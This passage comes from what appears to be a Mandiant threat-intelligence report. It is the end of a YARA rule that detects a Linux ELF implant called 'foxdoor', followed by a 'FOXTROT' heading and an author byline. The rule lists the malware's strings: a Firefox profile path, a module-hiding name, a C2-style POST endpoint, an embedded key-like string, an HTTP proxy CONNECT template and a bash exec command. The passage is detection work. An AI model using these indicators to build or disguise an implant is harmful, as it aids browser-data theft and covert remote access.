  $str1 = "/usr/share/foxdoor/uuid" 
  $str2 = "/.mozilla/firefox/" 
  $str3 = "hide_foxdoor_mod" 
  $str4 = "POST /api/index.cgi" 
  $str5 = "7(Zu9YTsA7qQ#vw" 
  $str6 = "CONNECT %s:%d HTTP/1.1" 
  $str7 = "network.proxy.http_port" 
  $str8 = "exec bash --rcfile" 
condition:
  uint32(0) == 0x464c457f and all of them
}

FOXTROT

Mandiant Security Validation Actions

Organizations can validate their security controls using the following actions with Mandiant Security Validation.

-Mandiant, 作成者: Austin Larsen, John Palmisano, John Wolfram, Mathew Potaczek, Michael Raggi